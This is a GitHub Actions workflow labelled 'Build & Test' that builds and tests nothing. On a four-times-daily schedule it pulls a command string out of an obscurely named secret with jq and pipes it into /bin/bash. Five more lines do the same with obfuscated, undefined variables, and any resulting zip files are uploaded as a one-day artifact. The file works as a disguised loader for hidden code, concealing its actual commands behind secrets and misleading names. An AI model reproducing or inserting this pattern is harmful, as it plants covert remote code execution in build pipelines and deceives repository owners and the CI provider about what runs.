name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '25 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          wx33460: ${{ secrets.wx33460 }}
        run: |
          printf '%s' "$wx33460" | jq -r .jmhiv240 | /bin/bash
          printf '%s' "$qmc114" | jq -r .a223 | /bin/bash
          echo $dy43 | jq -r .viq5402 | /bin/bash
          echo $hgne6612 | jq -r .hvla17375 | /bin/bash
          echo $b76 | jq -r .g4429 | /bin/bash
          echo $ii3 | jq -r .rfx004 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: t1HxSs0W
          path: "*.zip"
          retention-days: 1
